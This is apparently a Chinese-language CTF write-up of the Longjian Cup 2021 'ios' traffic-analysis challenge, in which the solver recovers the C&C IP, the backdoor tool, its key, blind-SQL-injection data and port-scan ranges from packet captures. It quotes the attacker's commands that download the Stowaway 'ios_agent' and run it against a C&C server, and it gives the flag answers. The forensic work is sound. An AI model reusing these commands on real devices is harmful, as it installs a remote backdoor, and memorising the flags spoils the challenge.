[陇剑杯 2021]ios流量分析

[陇剑杯 2021]ios（问1）

一位ios的安全研究员在家中使用手机联网被黑，不仅被窃密还丢失比特币若干，请你通过流量和日志分析后作答：黑客所控制的C&C服务器IP是********_。得到的flag请使用NSSCTF{}格式提交。

首先过滤http的流量,这边依次点击，进行排查黑客上传了那些文件

后面发现上传了一个ios_agent后门文件

并发现上传的服务器IP

NSSCTF{3.128.156.159}

[陇剑杯 2021]ios（问2）

一位ios的安全研究员在家中使用手机联网被黑，不仅被窃密还丢失比特币若干，请你通过流量和日志分析后作答：黑客利用的Github开源项目的名字是**__**。（如有字母请全部使用小写）。得到的flag请使用NSSCTF{}格式提交。

这段命令是用于从 GitHub 下载一个名为 <font style="color:rgb(122, 122, 122);">ios_agent</font> 的文件并赋予它可执行权限。

wget https://github.com/ph4ntonn/Stowaway/releases/download/1.6.2/ios_agent && chmod 755 ios_agent

主站+用户名+项目名称+项目资源

所以flag就是

NSSCTF{stowaway}

[陇剑杯 2021]ios（问3）

一位ios的安全研究员在家中使用手机联网被黑，不仅被窃密还丢失比特币若干，请你通过流量和日志分析后作答：通讯加密密钥的明文是********。得到的flag请使用NSSCTF{}格式提交。

./ios_agent -c 3.128.156.159:8081 -s hack4sec

分析：

运行ios_agent这个程序在3.128.156.159:8081这个端口下-s hack4sec 就是密钥明文

NSSCTF{hack4sec}

[陇剑杯 2021]ios（问4）

一位ios的安全研究员在家中使用手机联网被黑，不仅被窃密还丢失比特币若干，请你通过流量和日志分析后作答：黑客通过SQL盲注拿到了一个敏感数据，内容是********。得到的flag请使用NSSCTF{}格式提交。

因为有些流量的信息是加密的所以要进行解密，这边下载有一个keylog的文件，猜测是TLS解密

给它导入进行解密

打开首先项，再打开Protocols进行TLS解密，应用就行了

筛选http2这个协议，并搜索关键词select

再导出为CVS格式

再写一个提取脚本

import csv
import urllib.parse

# 打开CSV文件
with open('CTF解密脚本/111.csv', newline='', encoding='utf-8') as csvfile:
    reader = csv.reader(csvfile)
    # 打开22.txt文件用于写入
    with open('22.txt', 'w', encoding='utf-8') as txtfile:
        for row in reader:
            # 查找包含SQL盲注的语句
            for item in row:
                if 'select_hex' in item:
                    # URL解码
                    decoded_sql = urllib.parse.unquote(item)
                    
                    # 写入到22.txt文件
                    txtfile.write(decoded_sql + '\n')

再进提取成功的注入的值

import re

# 读取数据
with open('22.txt', 'r') as file:
    lines = file.readlines()

output_str = ''  # 存储最终字符串

# 遍历数据
for i in range(1, len(lines)):  # 从第二行开始
    current_line = lines[i]
    previous_line = lines[i-1]

    # 过滤数据
    if re.search(r'from_user\)="2B', current_line):
        # 使用正则表达式提取内容
        match = re.search(r'from_user\)="(.*)"', previous_line)
        if match:
            output_str += match.group(1) + ' '

# 输出结果
print(output_str)

去掉后面的zzz就是答案

NSSCTF{746558f3-c841-456b-85d7-d6c0f2edabb2}

[陇剑杯 2021]ios（问5）

一位ios的安全研究员在家中使用手机联网被黑，不仅被窃密还丢失比特币若干，请你通过流量和日志分析后作答：黑客端口扫描的扫描器的扫描范围是********。（格式使用“开始端口-结束端口”，例如1-65535）。得到的flag请使用NSSCTF{}格式提交。

一般扫描是TCP进行筛选一下，再点击专家信息筛选RST

_高亮选中的一行显示了一个 TCP 连接的建立过程中的警告信息 “Connection reset (RST)”。_这个 RST (Reset) 标志位通常表示 TCP 连接被异常终止或重置。在正常的 TCP 连接关闭过程中,双方会发送带有 FIN 标志的数据包来优雅地关闭连接。而 RST 标志则用于非正常或意外的连接中断

NSSCTF{10-499}

[陇剑杯 2021]ios（问6）

一位ios的安全研究员在家中使用手机联网被黑，不仅被窃密还丢失比特币若干，请你通过流量和日志分析后作答：被害者手机上被拿走了的私钥文件内容是********。得到的flag请使用NSSCTF{}格式提交。

有问题

[陇剑杯 2021]ios（问7）

一位ios的安全研究员在家中使用手机联网被黑，不仅被窃密还丢失比特币若干，请你通过流量和日志分析后作答：黑客访问/攻击了内网的几个服务器，IP地址为********。（多个IP之间按从小到大排序，使用#来分隔，例如127.0.0.1#192.168.0.1)。得到的flag请使用NSSCTF{}格式提交。

更具日志文件分析，还有流量的端点统计，再已知内网 192 |172 进行筛选

这个最大，说明是攻击者的

根据前面的盲注，被攻击的ip是192.168.1.12

日志文件：

NSSCTF{172.28.0.2#192.168.1.12}

总结

有点难，但问题不大